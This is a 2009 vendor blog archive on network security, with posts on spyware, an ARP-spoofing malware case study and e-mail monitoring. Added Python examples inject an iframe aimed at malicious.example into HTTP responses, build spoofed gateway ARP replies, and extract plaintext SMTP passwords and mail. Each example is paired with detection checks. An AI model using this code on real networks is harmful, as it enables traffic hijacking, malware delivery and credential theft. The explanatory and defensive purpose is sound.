Showing posts with label network security.

Wednesday, August 19, 2009

How to Discover Network Security Loopholes

As global connectivity expands, discovering the loopholes in a network can look deceptively easy. The diversity of today's networks calls for companies to invest more in training their network operators to find those loopholes. At the same time, sophisticated attackers spend sleepless nights working out how to find the same weaknesses and penetrate through them. This calls for network security managers who are able to hack into their own systems first.


These challenges are the main forces driving research on discovering network security loopholes, and as technology advances the cat-and-mouse game between attackers and defenders continues.

The main method used in most networks today to discover security loopholes is penetration testing, examined below.


Penetration Testing


Penetration testing can be defined as the process of actively testing information security measures. Organisations perform penetration tests to identify the threats facing them and to resolve the vulnerabilities and weaknesses that are found.


There are several types of penetration test:


i. External Penetration Testing

The oldest approach to testing; it focuses on the servers, infrastructure and software that the target system exposes. This type of test is performed either with no prior knowledge of the site (black box) or with full knowledge of the network topology (white box).


ii. Internal Security Assessment

This approach is similar to external penetration testing but is run from inside the network, and it includes a security report of the site. The test is typically performed from a number of access points representing the different network segments.


iii. Application Security Assessment

This identifies and assesses threats to an organisation through the software applications that provide interactive access to potentially sensitive material. It is essential that these applications are assessed to ensure that they do not expose the servers and the underlying software to attack.


iv. Telephony Security Assessment

This assessment addresses security concerns relating to corporate voice technologies.


v. Social Engineering Security Assessment

This assessment addresses social engineering, a non-technical kind of intrusion that targets people rather than systems.

For more information about penetration testing, penetration-testing.com has a great deal of useful material.


Network Analysing


After penetration testing, the problems that were found can be detected and confirmed with a network sniffer/analyzer. With professional data capture and comprehensive network analysis capabilities, Colasoft Network Analyzer lets you monitor your network within seconds and get the most out of it.

Tuesday, August 18, 2009

Are You Being Watched?

by Brett Glass -- pcmag.com

How private is your PC data? Thanks to the proliferation of Internet worms and hardware and software spying tools, the erosion of loyalty between corporations and their employees, and the 9/11 disaster (which has caused many to value security over privacy and civil rights), the likelihood is greater than ever that your computer is reporting your every move to a suspicious spouse, a government agency, an employer, or the entire world. In this article, we'll cover the most prevalent spying hardware and software and explain how it can be used, abused, and detected.

A hardware key logger is a device that captures keystrokes en route from keyboard to PC. KeyGhost (www.keyghost.com), a New Zealand company, offers two hardware key loggers. The first is an inconspicuous cable that runs from the keyboard to the PC (prices start at $139 and go up to $409 direct). The second is a keyboard with the logging hardware tucked entirely inside the case ($189 and up). The company claims to have a wide variety of bugged keyboards ready-made to match many brands of computers. If your existing keyboard is unique, KeyGhost will modify it and return it with the logger hidden inside. Both the internal and external versions have maximum capacities of about 2MB—enough memory to capture as much as a year's worth of typing. The Spy Store (www.thespystore.com/pcsurveillance.htm) shows a more compact external key logger ($139 direct). It has a smaller memory capacity, but its capabilities are otherwise similar.

Hardware key loggers usually can't be detected by software and may be tough for non-technical users to spot. They're also compatible with most operating systems and don't require complicated installations. The main drawback is that they can't capture the information that appears on the screen but isn't typed in by the user. So hardware devices are best used to sniff out small but vital pieces of information, such as passwords.

Although keystroke-logging hardware is relatively new, software that performs the same function is not. In 1988, I implemented a primitive network keystroke logger as a DOS TSR, using the NetBIOS protocol. My motivation at the time was not to spy but to ensure that my programming work was preserved on another machine in the event of a system crash.

But today's spying programs do much more than log keystrokes. Spying software can be selective about the data it captures; administrators can set the software to skim information and then capture more data when certain criteria are met. WinWhatWhere Investigator (www.winwhatwhere.com), a major product in the monitoring market, captures keystrokes, e-mails information about your activities when key phrases are entered, and even renames itself and changes its location at random. If the victim's machine has a Webcam connected, WinWhatWhere snaps pictures periodically and sends them out surreptitiously.

SpectorSoft (www.spectorsoft.com) makes Spector Pro, which captures screen shots, records e-mail and chat sessions, and logs keystrokes. In short, if something of interest to you happens on a user's machine, you will not only know what the person typed, you'll have logs of e-mail and chat room conversations and pictures of the screen. Competing products such as D.I.R.T., from Codex Data Systems (www.codexdatasystems.com/menu.html), offer similar features. And several keystroke logger programs are freely available for download from many shareware archives. Logging software is easier to detect via system diagnostic tools, however, and may be wiped off the hard drive by reconfiguring or reinstalling the operating system.

In some cases, spying software may be installed as a virus, worm, or Trojan horse that arrives via e-mail or an infected file. Back Orifice, a program created by a group of rogue hackers called The Cult of the Dead Cow, can be installed in this way and can spy on and even commandeer the victim's system. Several recent worms, including Badtrans.B, attempt to capture passwords and credit card information from users' systems and forward the information to the worms' creators via e-mail or Internet relay chat (IRC).

Another spying technique uses a network sniffer (usually a computer running special software) installed on the same LAN as the victim's computer or upstream between the victim's computer and the Internet. The sniffer taps and records the raw data flowing between the victim and other machines; this data can be scanned later.

Only a few Internet protocols use encryption. E-mail is most often sent and retrieved as plain text, and the password needed to break into someone's electronic mailbox is very rarely encrypted. If encryption is used, a key logger can often be used to discover the password that unlocks the data.

The FBI's Carnivore system, which is installed at ISP facilities to collect evidence, is one example of a network sniffer. Civilian tools that can sniff LAN traffic—even on networks supposedly protected from monitoring by network switches—are widely available for free via the Internet.

Even if the party who wants to spy on you has no physical access to your network, you cannot necessarily rest easy. A cracker who manages to gain control of any vulnerable system on your network can set it up to sniff traffic from the rest of the network. And recently revealed bugs in most implementations of SNMP (Simple Network Management Protocol) may provide an easy way for intruders to take over managed hubs and switches, routers, print servers, and network appliances. (For more on these bugs, see the CERT advisory.)

Wednesday, August 5, 2009

Case Study: ARP spoofing HTTP infection malware

This year we've seen many ARP spoofing viruses, also known as ARP cache-poisoning viruses. This type of malware comes in many variants and is widespread in China. Recently we uncovered an ARP spoofing virus that exhibits several new features.

The new ARP spoofing virus inserts a malicious URL into the HTTP responses that pass through it, delivering malicious content that exploits Internet Explorer. At the same time the virus makes the poisoned host act as an HTTP proxy server: when any machine in the same subnet as the poisoned machine accesses the Internet, its traffic goes through the poisoned machine.

Let's take a detailed look at the features of the latest ARP spoofing virus.

This type of virus replaces the Gateway's MAC address in each victim's ARP table with the MAC address of the poisoned machine. The following screenshot shows the correct Gateway MAC address:
[screenshot arpspoof0: ARP table with the correct Gateway MAC address]

When we run the ARP spoofing virus, the Gateway MAC address changes, as the next screenshot shows: the entry for the real Gateway now carries the MAC address of the poisoned machine.
[screenshot arpspoof1: ARP table after infection, Gateway entry showing the poisoned machine's MAC address]

Now let's look at a detailed analysis of the virus.

The following diagram shows the mechanism used by this type of virus. Normally, when we open a Web page, the traffic goes to the Gateway directly (pathway 4). But if the local network is infected by an ARP spoofing virus, the traffic passes through the poisoned machine before it reaches the Gateway (pathways 5 and 6):
[diagram arpspoof2: normal path (4) versus poisoned path (5, 6) through the infected machine]

The following steps describe what occurs.

First step: The poisoned machine broadcasts ARP spoofing packets saying "I am the Gateway".

Second step: Each machine in the subnet receives an ARP spoofing packet and updates its ARP table, so its ARP cache is poisoned.

Third step: A machine accesses the Internet through the poisoned machine, which forwards the HTTP packets on to the Gateway (the poisoned machine uses a packet-capture driver such as wpcap.dll or WanPacket.dll to read and inject network traffic).

Fourth step: The poisoned machine inserts a malicious URL into the HTTP response packet coming back from the Gateway and then sends the modified packet to the target machine.
In the following code, we see how the virus inserts the malicious link:
[screenshot arpspoof3: disassembly of the routine that inserts the malicious link into the HTTP response]
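The HTTP-response tampering of the fourth step, as an added example that is not code from the case study: a poisoned machine sitting in the proxy position splices a tag into an HTML body and recomputes Content-Length, and two cheap checks a defender can run on a reassembled response. The hostname malicious.example, the sample page and the responses are all constructed for the example.

```python
# Hypothetical attacker-controlled URL; not an address from the case study.
INJECTED_TAG = b'<iframe src="http://malicious.example/x.htm" width="0" height="0"></iframe>'


def build_response(body, content_type=b"text/html"):
    """Minimal HTTP/1.1 200 response with a correct Content-Length (constructed sample)."""
    return (b"HTTP/1.1 200 OK\r\nContent-Type: " + content_type +
            b"\r\nContent-Length: " + str(len(body)).encode() + b"\r\n\r\n" + body)


def split_response(raw):
    head, sep, body = raw.partition(b"\r\n\r\n")
    if not sep:
        raise ValueError("incomplete header block")
    status, *header_lines = head.split(b"\r\n")
    headers = []
    for line in header_lines:
        name, _, value = line.partition(b":")
        headers.append((name.strip(), value.strip()))
    return status, headers, body


def header(headers, name):
    for k, v in headers:
        if k.lower() == name.lower():
            return v
    return None


def join_response(status, headers, body):
    return status + b"\r\n" + b"".join(k + b": " + v + b"\r\n" for k, v in headers) + b"\r\n" + body


def inject(raw, tag=INJECTED_TAG, fix_length=True):
    """What the poisoned machine does in step 4: splice `tag` before </body> of an HTML
    response. Only plain, uncompressed, non-chunked bodies are touched, because anything
    else would have to be decoded first. A careless injector that leaves Content-Length
    stale (fix_length=False) truncates or stalls the page, which is how such tampering is
    often first noticed."""
    status, headers, body = split_response(raw)
    ctype = header(headers, b"Content-Type") or b""
    if not ctype.lower().startswith(b"text/html"):
        return raw
    if header(headers, b"Transfer-Encoding") or header(headers, b"Content-Encoding"):
        return raw
    idx = body.lower().rfind(b"</body>")
    new_body = body + tag if idx == -1 else body[:idx] + tag + body[idx:]
    if fix_length:
        headers = [(k, str(len(new_body)).encode() if k.lower() == b"content-length" else v)
                   for k, v in headers]
    return join_response(status, headers, new_body)


def content_length_ok(raw):
    """Cheap consistency check a client or IDS can apply to a reassembled response."""
    _, headers, body = split_response(raw)
    declared = header(headers, b"Content-Length")
    return declared is None or int(declared) == len(body)


def find_insertion(clean, suspect):
    """Compare a body fetched over a trusted path with one fetched through the LAN.
    Assumes a single contiguous insertion and returns (offset, fragment) such that
    clean[:offset] + fragment + clean[offset:] == suspect, or None if no single insertion
    explains the difference. When the fragment shares bytes with its surroundings the split
    point is ambiguous, so the fragment may be a rotation of what was literally inserted."""
    p = 0
    while p < len(clean) and p < len(suspect) and clean[p] == suspect[p]:
        p += 1
    s = 0
    while s < min(len(clean), len(suspect)) - p and clean[len(clean) - 1 - s] == suspect[len(suspect) - 1 - s]:
        s += 1
    fragment = suspect[p:len(suspect) - s]
    if clean[:p] + fragment + clean[p:] != suspect:
        return None
    return p, fragment


CLEAN_BODY = b"<html><body><h1>Welcome</h1></body></html>"   # constructed page

if __name__ == "__main__":
    clean = build_response(CLEAN_BODY)
    poisoned = inject(clean)
    print(poisoned.decode())
    print("Content-Length consistent:", content_length_ok(poisoned))
    print("injected fragment:", find_insertion(CLEAN_BODY, split_response(poisoned)[2]))
```

The Content-Length check only catches a sloppy injector; a careful one (the default here) produces a perfectly well-formed response, which is why the second check compares against a copy of the page fetched over a path the attacker cannot reach, for example from outside the poisoned subnet.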

In the code above we can see partial IP address information. It comes from the author's network environment, and the offsets and values are similar to the following:

offset    value          meaning
0000b3b0  255.255.255.0  subnet mask
0000b3c0  10.xx.xx.58    poisoned machine IP address
0000b840  10.xx.xx.1     correct Gateway address
0000b850  10.xx.xx.*     subnet information

Once the virus has this data, it scans the local subnet and then sends ARP spoofing packets to the machines it finds there.
Let's see how the virus implements these functions:
[screenshot arpspoof4: disassembly of the subnet scan and ARP spoofing routine]

In the code above, the virus calls a system DLL (iphlpapi.dll), which contains the functions of the Windows IP Helper API, to get general information about the local network adapter. With the adapter information in hand, the virus can construct its spoofed ARP packets. The following screenshot shows the detailed code:
[screenshot arpspoof5: disassembly of the spoofed ARP packet construction]
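The spoofed ARP packets described in steps 1 and 2 and the Gateway-MAC change visible in the two ARP-table screenshots, as an added example that is not code from the case study: the attacker side builds unsolicited "I am the Gateway" replies in the RFC 826 layout in pure Python (no capture driver involved, so nothing is sent), and the defender side, modelled on tools such as arpwatch, flags any ARP packet that changes the MAC recorded for the gateway IP. All addresses are constructed for the example and are not the author's 10.xx.xx.* network.

```python
import struct

ETH_P_ARP = 0x0806
ARP_REQUEST, ARP_REPLY = 1, 2
BROADCAST_MAC = "ff:ff:ff:ff:ff:ff"

# Constructed addresses for the example (not the case study's real network).
GATEWAY_IP, GATEWAY_MAC = "10.0.0.1", "00:50:56:00:00:01"
ATTACKER_IP, ATTACKER_MAC = "10.0.0.58", "00:0c:29:aa:bb:58"
VICTIM_IP, VICTIM_MAC = "10.0.0.20", "00:0c:29:aa:bb:20"


def mac_bytes(mac):
    return bytes(int(x, 16) for x in mac.split(":"))


def ip_bytes(ip):
    return bytes(int(x) for x in ip.split("."))


def mac_str(b):
    return ":".join(f"{x:02x}" for x in b)


def ip_str(b):
    return ".".join(str(x) for x in b)


def build_arp(op, sender_mac, sender_ip, target_mac, target_ip):
    """Ethernet II frame carrying one ARP packet (RFC 826): 14 + 28 = 42 bytes."""
    eth = mac_bytes(target_mac) + mac_bytes(sender_mac) + struct.pack("!H", ETH_P_ARP)
    arp = struct.pack("!HHBBH", 1, 0x0800, 6, 4, op)   # Ethernet, IPv4, hlen, plen, opcode
    arp += mac_bytes(sender_mac) + ip_bytes(sender_ip)
    arp += mac_bytes(target_mac) + ip_bytes(target_ip)
    return eth + arp


def parse_arp(frame):
    """Return the ARP fields of an Ethernet frame, or None if it is not IPv4-over-Ethernet ARP."""
    if len(frame) < 42 or struct.unpack("!H", frame[12:14])[0] != ETH_P_ARP:
        return None
    htype, ptype, hlen, plen, op = struct.unpack("!HHBBH", frame[14:22])
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4):
        return None
    return {
        "op": op,
        "sender_mac": mac_str(frame[22:28]), "sender_ip": ip_str(frame[28:32]),
        "target_mac": mac_str(frame[32:38]), "target_ip": ip_str(frame[38:42]),
    }


def spoof_frames(gateway_ip, attacker_mac, victims, broadcast=False):
    """Step 1 of the case study: unsolicited ARP replies claiming 'I am the Gateway'.
    Each reply pairs the gateway's IP with the attacker's MAC; hosts that accept
    unsolicited replies overwrite their cached gateway entry (step 2)."""
    frames = []
    for victim_ip, victim_mac in victims:
        dst = BROADCAST_MAC if broadcast else victim_mac
        frames.append(build_arp(ARP_REPLY, attacker_mac, gateway_ip, dst, victim_ip))
    return frames


class ArpWatch:
    """Defender side: remember the MAC first seen (or configured) for each IP and
    report any ARP packet whose sender fields contradict it."""

    def __init__(self, known=None):
        self.table = dict(known or {})
        self.alerts = []

    def observe(self, frame):
        a = parse_arp(frame)
        if a is None:
            return None
        ip, mac = a["sender_ip"], a["sender_mac"]
        old = self.table.get(ip)
        if old is None:
            self.table[ip] = mac          # first sighting: learn it
            return None
        if old != mac:                    # mapping flipped: the change the screenshots show
            alert = (ip, old, mac)
            self.alerts.append(alert)
            return alert
        return None


if __name__ == "__main__":
    watch = ArpWatch({GATEWAY_IP: GATEWAY_MAC})
    legit = build_arp(ARP_REPLY, GATEWAY_MAC, GATEWAY_IP, VICTIM_MAC, VICTIM_IP)
    print("legitimate reply:", watch.observe(legit))
    for f in spoof_frames(GATEWAY_IP, ATTACKER_MAC, [(VICTIM_IP, VICTIM_MAC)]):
        print("spoofed reply:  ", watch.observe(f))
```

Seeding the watch table with the gateway's known MAC (from the clean ARP table in the first screenshot) is what makes the alert fire on the very first spoofed reply; without a seed the watcher would simply learn whichever mapping arrives first.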

We used OllyDbg to trace the virus into Windows system space and obtained the code above. One piece of background knowledge is needed to understand this virus: it uses the packet-capture driver mentioned above (wpcap.dll / WanPacket.dll) to capture network traffic and insert malicious Web code into the HTTP response.

Thursday, July 2, 2009

Why should we monitor the network conversation?

In any networked organisation, whether a company, an enterprise, a school, a bank or a government agency, confidential information is extremely valuable, and its disclosure can be very dangerous.



A manager can also see what staff are discussing over the Internet at any time, whether they use MSN, Yahoo, Gtalk, ICQ, AIM, e-mail or webmail. Such monitoring must of course be authorised and carried out in line with local law and company policy.



In this situation we need a network monitor/packet sniffer, not only to monitor network conversations but also to protect network security by spotting danger beforehand.



Resolution
Take Colasoft Capsa 6.9 as an example. Here is how to monitor e-mail activity and content with it, step by step:

1. Choose "Logs" from the main window.

2. As shown in the following illustration, a window for changing settings pops up after you choose "Logs". Go to Email Log → Log File Settings and change the settings indicated by the arrow.

3. Choose Email Messages in the Logs view to see detailed information on all e-mail activity.

4. Double-click an entry to read the content of any e-mail you want.
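What a sniffer can read from an unencrypted mail session, as an added example that is not part of this post and is not Capsa's own code: it illustrates both the e-mail log shown in the steps above and the point in the "Are You Being Watched?" post that e-mail and mailbox passwords are usually sent as plain text. The SMTP dialogue, addresses and credentials are constructed; in a real capture the lines would come from TCP stream reassembly of port 25 (or 110/143 for POP3/IMAP, which leak the same things).

```python
import base64
from email.parser import Parser


def b64(raw):
    return base64.b64encode(raw).decode("ascii")


# Constructed SMTP session as a sniffer would reassemble it from TCP port 25
# ("C" = client line, "S" = server line). Names, addresses and credentials are invented.
SAMPLE_SESSION = [
    ("S", "220 mail.example.test ESMTP"),
    ("C", "EHLO laptop.example.test"),
    ("S", "250-mail.example.test"),
    ("S", "250 AUTH PLAIN LOGIN"),
    ("C", "AUTH PLAIN " + b64(b"\0alice\0hunter2")),   # RFC 4616: \0authcid\0passwd, base64
    ("S", "235 2.7.0 Authentication successful"),
    ("C", "MAIL FROM:<alice@example.test>"),
    ("S", "250 OK"),
    ("C", "RCPT TO:<bob@example.test>"),
    ("S", "250 OK"),
    ("C", "DATA"),
    ("S", "354 End data with <CR><LF>.<CR><LF>"),
    ("C", "From: alice@example.test"),
    ("C", "To: bob@example.test"),
    ("C", "Subject: Q3 numbers"),
    ("C", ""),
    ("C", "The draft figures are attached."),
    ("C", "..this line really starts with one dot"),   # dot-stuffed by the client (RFC 5321 4.5.2)
    ("C", "."),
    ("S", "250 OK: queued"),
    ("C", "QUIT"),
]


def parse_smtp_session(lines):
    """Walk the client side of an SMTP dialogue and pull out what a passive sniffer
    can read when neither TLS nor a challenge-response SASL mechanism is in use."""
    result = {"credentials": None, "messages": []}
    in_data, body, envelope = False, [], {"from": None, "to": []}
    for side, line in lines:
        if side != "C":
            continue
        if in_data:
            if line == ".":                                  # end of message
                msg = Parser().parsestr("\n".join(body))     # real captures use CRLF
                result["messages"].append({
                    "envelope_from": envelope["from"],
                    "envelope_to": list(envelope["to"]),
                    "subject": msg["Subject"],
                    "body": msg.get_payload(),
                })
                in_data, body, envelope = False, [], {"from": None, "to": []}
            else:
                body.append(line[1:] if line.startswith("..") else line)   # undo dot-stuffing
            continue
        verb, _, arg = line.partition(" ")
        verb = verb.upper()
        if verb == "AUTH" and arg.upper().startswith("PLAIN "):
            authzid, authcid, passwd = base64.b64decode(arg.split(None, 1)[1]).split(b"\0")
            result["credentials"] = (authcid.decode(), passwd.decode())
        elif verb in ("MAIL", "RCPT"):
            address = arg.split(":", 1)[1].strip().strip("<>")
            if verb == "MAIL":
                envelope["from"] = address
            else:
                envelope["to"].append(address)
        elif verb == "DATA":
            in_data = True
    return result


if __name__ == "__main__":
    captured = parse_smtp_session(SAMPLE_SESSION)
    print("credentials:", captured["credentials"])
    for m in captured["messages"]:
        print(m["envelope_from"], "->", m["envelope_to"], "|", m["subject"])
        print(m["body"])
```

The same parser sees nothing useful once the client issues STARTTLS, because everything after the server's 220 reply is ciphertext; that is the practical difference between a monitoring tool seeing full messages and seeing only that a connection to port 25 occurred.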

Conclusion:

For every organisation, institution, company or enterprise, confidential information is important and must never be allowed to leak out.



Beyond traditional file encryption and video surveillance, what can we do in a large network? In this situation a powerful packet sniffer/network analyzer is a very good right hand.

Tuesday, June 16, 2009

14 Tips to Protect Your Organization's Network

Colasoft Network Analyzer

Network security is an infinitely complex and dynamic subject, but implementing these simple measures will go a long way toward protecting your organization's LAN.


1. Run a network analyzer frequently. We recommend an easy-to-use network analyzer, Colasoft Capsa.


2. Disable drives: disable floppy drive access, USB ports and serial ports on networked computers.


3. Restrict permissions: Windows 2000 and 2003 Server let you set permissions and policies so that users can't run downloaded .exe or other executable files.


4. Block instant messaging: IM clients such as ICQ and Yahoo Messenger send messages and attachments out to a server and then back to their clients; you lose control of that data when this happens.


5. Password-protect your BIOS: a BIOS without an administrator password is an invitation to mischief.


6. Run AV software: run anti-virus software on all your computers.


7. Build your defenses: install a firewall or a proxy server.


8. Beware of attachments from unknown, untrusted sources: do not open e-mail attachments unless you trust the sender.


9. Monitor your ports: install a port monitor so that you notice when your ports are being scanned.


10. Encrypt wireless access.


11. Keep back-office systems off the organization network.


12. Require passwords to be changed frequently.


13. Use CTRL+ALT+DEL to log on.


14. Keep your networking skills up to date.

Tuesday, April 21, 2009

5 Things Our IT Department had to skip

In the last blog post we talked about the 5 items our IT department must do even in the big recession. In addition to the things we can't do without, there are many more things we had to skip. We are not exactly happy to stop doing these things, but desperate times call for desperate measures, and since these activities are something we can do without, we had to either quit them or drastically reduce them:
  • No purchases of new hardware. Though it is not precise to say that we haven't bought a single piece of hardware in the last year, we have definitely cut hardware spending. For the time being we do not plan to make major hardware purchases.

  • Capital expenditures. Capital expenditures are another budget item we had to drastically shrink. We had scheduled projects, but the current economic situation made us have second thoughts, and now capital expenditures are on hold.

  • Software that is nice to have but we can do without. Similarly to hardware and capital expenditures, some major software expenses had to be cut. Yes, there are many products, for instance accounting, HR, or ERP modules, which are great to have, but we'll go for them when the economic outlook is less gloomy.

  • Standardization. You know that IT people generally hate having to deal with bureaucracy and standardization, so if there is an item we are happy to skip, it is standardization. More or less we skipped all standardization-related activities except those related to regulatory compliance. Standardization is put on hold, especially if it requires investment or other resources.

  • No infrastructure upgrades. We are not exactly happy about this one, but since there are more important items we can't skip, we had to significantly reduce the planned network upgrades. Some of the projects in this area are put on hold, while others are canceled.

It wasn't easy to decide what to skip and what to keep, but when times are tough it is not possible to pretend that everything is OK and go on as planned. We hope that we are right in our choices, and time will show whether we made wise choices or not.

James Ackland is Author of this article from www.Colasoft.com.

About Colasoft Co., Ltd.
Ever since 2001, Colasoft has been dedicated in providing all-in-one and easy-to-use network sniffer software for network administrators and IT managers to monitor network activities, analyze network performance, enhance network security, and troubleshoot network problems. Up to now, more than 5000 customers in over 70 countries trust the flagship product – Colasoft Network Sniffer as their network monitoring and troubleshooting solution. Colasoft also offers four free network utilities: Colasoft Packet Builder, Colasoft Packet Player, Colasoft MAC Scanner, and Colasoft Ping Tool. Learn more about Colasoft and its solutions, please visit http://www.colasoft.com/.

Sunday, April 19, 2009

Top 5 Items Our IT Department Must Do

Even though it is a basic economic fact that recessions happen once or twice in a decade, when the economy is in a good shape, like it was a couple of years ago, people, including IT managers, tend to forget that the summer will be over and hard times will come soon. On the other hand, recessions might be bad but the current one is certainly worse than many of the ones before. Actually, this is the worst recession since the Great Depression in the 1930s and even the most optimistically-minded managers have really serious reasons to fear and be cautious.

We can't say that the recession took us by surprise but certainly we didn't expect it to be that fierce. However, recession or no recession, life must go on and if a company wants to make it, there are many things which can't be skipped. So, no matter that IT budgets are tight, there are items a company can't save on. Here are the top 5 items our IT department will not sacrifice:

1, Network security and security in general. Being in the network security business ourselves, we know that network security, and security in general, is paramount, and no matter how hard the economic situation might be, this is not an item to save on because the price is too high. Certainly, we are not buying the most expensive solutions, even though they are incredibly great, but we do not make compromises on quality either.

2, Going green. Going green is also an item we can't skip. Green technology saves money and now this benefit is more important than ever. So, if we buy new IT stuff, we definitely go for the green items.

3, Compliance. Regulations compliance is another item we can't afford to skip, unless we really want to go out of business (and we don't). So, when there are steps in this direction to be taken, we do them – no way!

4, Training. Training is also important and even though our training budget has shrunk, we still try to keep our staff qualified.

5, Outsourcing. Outsourcing has been a successful strategy for our company at all times and now, when money issues start to surface, we are happy that outsourcing helps us cut cost with no sacrifice of quality.


Kevin Chou is Author of this article from www.Colasoft.com.
